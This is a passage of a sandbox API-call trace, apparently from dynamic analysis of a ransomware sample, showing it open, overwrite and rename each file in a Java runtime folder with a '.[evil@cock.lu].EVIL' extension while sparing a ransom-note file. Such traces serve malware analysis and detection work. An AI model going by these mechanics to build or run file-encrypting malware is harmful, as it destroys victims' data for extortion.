[0092.934] __uncaught_exception () returned 0x84b1160800 [0092.934] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.934] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\management.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\management.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\management.dll.[evil@cock.lu].evil")) returned 1 [0092.934] ??_V@YAXPEAX@Z () returned 0x1 [0092.937] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\management.dll", dwFileAttributes=0x0) returned 0 [0092.938] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.938] wcsstr (_Str="mlib_image.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.938] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\mlib_image.dll") returned 54 [0092.938] wcscmp (_String1="mlib_image.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.938] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mlib_image.dll") returned 0x0 [0092.938] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\mlib_image.dll") returned 0x36 [0092.938] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\mlib_image.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.939] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x9fa40, lpOverlapped=0x0) returned 1 [0092.956] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.956] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.956] _errno () returned 0x84b1160840 [0092.957] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.957] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x9fa60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x9fa60, lpOverlapped=0x0) returned 1 [0092.959] CloseHandle (hObject=0x1a4) returned 1 [0092.959] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\mlib_image.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.959] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.959] __uncaught_exception () returned 0x84b1160800 [0092.959] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.959] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\mlib_image.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\mlib_image.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\mlib_image.dll.[evil@cock.lu].evil")) returned 1 [0092.960] ??_V@YAXPEAX@Z () returned 0x1 [0092.963] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\mlib_image.dll", dwFileAttributes=0x0) returned 0 [0092.963] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.963] wcsstr (_Str="msvcp120.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.963] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcp120.dll") returned 52 [0092.963] wcscmp (_String1="msvcp120.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.963] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcp120.dll") returned 0x0 [0092.963] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcp120.dll") returned 0x34 [0092.963] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.965] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xa12a0, lpOverlapped=0x0) returned 1 [0092.977] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.977] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.977] _errno () returned 0x84b1160840 [0092.978] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.978] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xa12c0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xa12c0, lpOverlapped=0x0) returned 1 [0092.980] CloseHandle (hObject=0x1a4) returned 1 [0092.980] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcp120.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.980] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.980] __uncaught_exception () returned 0x84b1160800 [0092.980] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.980] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcp120.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcp120.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcp120.dll.[evil@cock.lu].evil")) returned 1 [0092.981] ??_V@YAXPEAX@Z () returned 0x1 [0092.984] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcp120.dll", dwFileAttributes=0x0) returned 0 [0092.985] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.985] wcsstr (_Str="msvcr100.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.985] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr100.dll") returned 52 [0092.985] wcscmp (_String1="msvcr100.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.985] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcr100.dll") returned 0x0 [0092.985] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr100.dll") returned 0x34 [0092.985] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.987] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xca750, lpOverlapped=0x0) returned 1 [0093.035] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.035] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.035] _errno () returned 0x84b1160840 [0093.036] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.036] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xca760, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xca760, lpOverlapped=0x0) returned 1 [0093.038] CloseHandle (hObject=0x1a4) returned 1 [0093.038] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr100.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.038] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.038] __uncaught_exception () returned 0x84b1160800 [0093.038] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.039] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcr100.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr100.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcr100.dll.[evil@cock.lu].evil")) returned 1 [0093.039] ??_V@YAXPEAX@Z () returned 0x1 [0093.043] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr100.dll", dwFileAttributes=0x0) returned 0 [0093.043] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.043] wcsstr (_Str="msvcr120.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.043] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr120.dll") returned 52 [0093.043] wcscmp (_String1="msvcr120.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.043] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcr120.dll") returned 0x0 [0093.043] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr120.dll") returned 0x34 [0093.043] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.045] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xeb2a0, lpOverlapped=0x0) returned 1 [0093.068] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.068] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.068] _errno () returned 0x84b1160840 [0093.069] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.069] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xeb2c0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xeb2c0, lpOverlapped=0x0) returned 1 [0093.071] CloseHandle (hObject=0x1a4) returned 1 [0093.071] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr120.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.071] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.072] __uncaught_exception () returned 0x84b1160800 [0093.072] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.072] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcr120.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr120.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\msvcr120.dll.[evil@cock.lu].evil")) returned 1 [0093.072] ??_V@YAXPEAX@Z () returned 0x1 [0093.076] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\msvcr120.dll", dwFileAttributes=0x0) returned 0 [0093.076] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.076] wcsstr (_Str="net.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.076] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\net.dll") returned 47 [0093.076] wcscmp (_String1="net.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.076] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="net.dll") returned 0x0 [0093.076] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\net.dll") returned 0x2f [0093.076] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\net.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.078] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x17a40, lpOverlapped=0x0) returned 1 [0093.093] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.093] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.093] _errno () returned 0x84b1160840 [0093.093] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.093] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x17a60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x17a60, lpOverlapped=0x0) returned 1 [0093.094] CloseHandle (hObject=0x1a4) returned 1 [0093.094] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\net.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.094] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.094] __uncaught_exception () returned 0x84b1160800 [0093.094] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.094] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\net.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\net.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\net.dll.[evil@cock.lu].evil")) returned 1 [0093.095] ??_V@YAXPEAX@Z () returned 0x1 [0093.099] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\net.dll", dwFileAttributes=0x0) returned 0 [0093.099] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.099] wcsstr (_Str="nio.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.099] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\nio.dll") returned 47 [0093.099] wcscmp (_String1="nio.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.099] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="nio.dll") returned 0x0 [0093.099] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\nio.dll") returned 0x2f [0093.099] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\nio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.101] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xec40, lpOverlapped=0x0) returned 1 [0093.105] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.105] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.105] _errno () returned 0x84b1160840 [0093.105] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.105] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xec60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xec60, lpOverlapped=0x0) returned 1 [0093.105] CloseHandle (hObject=0x1a4) returned 1 [0093.105] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\nio.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.105] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.105] __uncaught_exception () returned 0x84b1160800 [0093.105] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.106] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\nio.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\nio.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\nio.dll.[evil@cock.lu].evil")) returned 1 [0093.106] ??_V@YAXPEAX@Z () returned 0x1 [0093.110] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\nio.dll", dwFileAttributes=0x0) returned 0 [0093.110] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.110] wcsstr (_Str="npt.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.110] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\npt.dll") returned 47 [0093.110] wcscmp (_String1="npt.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.110] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="npt.dll") returned 0x0 [0093.110] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\npt.dll") returned 0x2f [0093.110] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\npt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.113] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4a40, lpOverlapped=0x0) returned 1 [0093.116] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.116] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.116] _errno () returned 0x84b1160840 [0093.116] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.116] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4a60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4a60, lpOverlapped=0x0) returned 1 [0093.116] CloseHandle (hObject=0x1a4) returned 1 [0093.116] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\npt.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.116] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.116] __uncaught_exception () returned 0x84b1160800 [0093.117] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.117] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\npt.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\npt.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\npt.dll.[evil@cock.lu].evil")) returned 1 [0093.117] ??_V@YAXPEAX@Z () returned 0x1 [0093.121] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\npt.dll", dwFileAttributes=0x0) returned 0 [0093.121] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.121] wcsstr (_Str="orbd.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.121] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\orbd.exe") returned 48 [0093.121] wcscmp (_String1="orbd.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.121] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="orbd.exe") returned 0x0 [0093.121] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\orbd.exe") returned 0x30 [0093.121] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\orbd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.123] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0093.126] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.126] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.126] _errno () returned 0x84b1160840 [0093.126] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.126] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0093.126] CloseHandle (hObject=0x1a4) returned 1 [0093.126] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\orbd.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.127] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.127] __uncaught_exception () returned 0x84b1160800 [0093.127] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.127] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\orbd.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\orbd.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\orbd.exe.[evil@cock.lu].evil")) returned 1 [0093.128] ??_V@YAXPEAX@Z () returned 0x1 [0093.131] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\orbd.exe", dwFileAttributes=0x0) returned 0 [0093.131] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.131] wcsstr (_Str="pack200.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.131] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\pack200.exe") returned 51 [0093.131] wcscmp (_String1="pack200.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.131] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="pack200.exe") returned 0x0 [0093.131] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\pack200.exe") returned 0x33 [0093.132] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\pack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.134] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, 